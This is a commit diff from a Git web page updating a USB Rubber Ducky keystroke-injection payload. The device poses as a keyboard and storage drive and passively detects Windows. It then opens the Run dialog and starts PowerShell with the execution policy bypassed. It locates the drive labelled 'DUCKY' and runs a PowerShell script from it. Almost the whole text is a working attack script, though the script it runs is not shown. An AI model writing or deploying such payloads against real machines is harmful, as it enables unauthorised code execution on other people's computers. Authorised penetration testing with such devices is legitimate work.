Update payload.txt
Yeet
GitHub
parent
0e9ea1358b
commit
64a7666c12
|
|
@ -10,20 +10,70 @@ REM Attackmodes: HID, STORAGE
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
DEFAULTDELAY 20
|
DEFAULTDELAY 20
|
||||||
|
|
||||||
REM Initial Delay
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
DELAY 1000
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
REM Opens powershell with script execution enabled
|
REM_BLOCK DOCUMENTATION
|
||||||
GUI r
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
DELAY 700
|
Includes its own passive detect ready.
|
||||||
STRINGLN powershell -ExecutionPolicy Bypass
|
Does not require additional extensions.
|
||||||
DELAY 4000
|
|
||||||
|
|
||||||
REM Gets usb named "DUCKY"
|
USAGE:
|
||||||
STRINGLN $targetLabel = "DUCKY"
|
Extension runs inline (here)
|
||||||
STRINGLN $volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
STRINGLN $driveLetter = $volume.DriveLetter + ":"
|
boot delay
|
||||||
STRINGLN cd $driveletter
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
REM Runs powershell script
|
REM CONFIGURATION:
|
||||||
STRINGLN .\1.ps1
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM change this to your drive label
|
||||||
|
DEFINE #DRIVE_LABEL DUCKY
|
||||||
|
REM change this to the name of your PS1 script
|
||||||
|
DEFINE #PS1_FILE_NAME 1.ps1
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
REM Initial Delay
|
||||||
|
DELAY 1000
|
||||||
|
REM Opens powershell with script execution enabled
|
||||||
|
GUI r
|
||||||
|
DELAY 700
|
||||||
|
STRINGLN powershell -ExecutionPolicy Bypass
|
||||||
|
DELAY 4000
|
||||||
|
|
||||||
|
REM Gets usb drive letter of #DRIVE_LABEL
|
||||||
|
STRINGLN_POWERSHELL
|
||||||
|
$targetLabel = "#DRIVE_LABEL"
|
||||||
|
$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
|
||||||
|
$driveLetter = $volume.DriveLetter + ":"
|
||||||
|
cd $driveletter
|
||||||
|
END_STRINGLN
|
||||||
|
REM Runs powershell script
|
||||||
|
STRINGLN .\#PS1_FILE_NAME
|
||||||
|
|
||||||
|
END_IF
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue